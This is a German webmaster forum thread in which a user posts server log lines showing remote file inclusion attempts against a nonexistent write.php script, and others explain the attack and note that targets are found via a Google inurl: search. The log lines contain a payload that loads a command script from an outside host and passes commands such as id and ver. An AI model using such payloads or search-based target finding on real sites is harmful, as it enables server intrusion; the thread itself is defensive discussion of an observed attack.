ABAKUS

Aus einem Logfile:

168.115.64.21 - - [30/Aug/2005:17:58:07 +0200] "GET /Mietwagen/include/write.php?dir=https://www.dynalith.com/2003/iPROVE/in ... xt?&cmd=id HTTP/1.1" 404 2970 "-" "-"
168.115.64.21 - - [30/Aug/2005:18:10:50 +0200] "GET /Mietwagen/include/write.php?dir=https://www.dynalith.com/2003/iPROVE/in ... t?&cmd=ver HTTP/1.1" 404 2970 "-" "-"

Irgendjemand 'ne Ahnung, was da versucht wird?

cu, Robo

Na ja, ein Blick auf

https://www.dynalith.com/2003/iPROVE/include/cmd.txt

lehrt, daß da versucht wird, Code nachzuladen, um den Server zu hacken, das, was als cmd übergeben wird, wird ausgeführt (Versionsabfrage).

Offenbar gibt es höchst unsichere write.php-Scripte.

Hmm ... auf dem Server gibt es zwar /Mietwagen/, aber weder /Mietwagen/include/ noch /Mietwagen/include/write.php. Und was soll write.php sein? Ist das irgendein weitverbreitetes Script wie z. B. formmail.pl? Wie kommt der Angreifer auf die absurde Idee, es könnte auf dem Server /Mietwagen/include/write.php geben? Und warum sollte write.php den Code nachladen und ausführen?

cu, Robo

Es gibt unsichere Scripte und CMS in Massen, da wird irgendeines eine Struktur /Hauptordner/include/write.php haben und bsp. besonders gerne von Autoverleihern eingesetzt werden. Und wenn das Script Pfadparameter nicht korrekt prüft und einfach alles lädt und ausführt, was es bekommt (egal, von welchem Server), dann ist das banal.

Adressen kriegt man per google - inurl:/Mietwagen/

PS: Wenn man sich auch nur ein wenig mit Sicherheit beschäftigt, müßte das offene Scheunentor eigentlich klar sein.

oldInternetUser hat geschrieben:PS: Wenn man sich auch nur ein wenig mit Sicherheit beschäftigt, müßte das offene Scheunentor eigentlich klar sein.

Es gibt keins. Jedenfalls nicht hier.

cu, Robo